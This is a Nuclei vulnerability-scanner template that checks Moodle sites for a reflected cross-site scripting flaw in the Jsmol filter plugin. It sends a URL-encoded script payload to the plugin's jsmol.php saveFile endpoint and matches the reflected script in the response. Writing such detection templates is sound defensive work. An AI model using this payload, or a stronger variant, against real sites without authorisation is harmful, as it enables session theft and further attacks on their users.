nuclei-templates/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml

38 lines
1.1 KiB
YAML

id: moodle-filter-jmol-xss
info:
name: Moodle Jsmol - Cross-Site Scripting
author: madrobot
severity: medium
description: Moodle contains a cross-site scripting vulnerability via the Jsmol plugin and may also be susceptible to local file inclusion or server-side-request forgery. An attacker can execute arbitrary script in the browser of an unsuspecting user and steal cookie-based authentication credentials and launch other attacks.
reference:
- https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
tags: moodle,xss
requests:
- method: GET
path:
- "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert('XSS')</script>"
part: body
- type: word
part: header
words:
- "text/html"
# Enhanced by md on 2022/09/19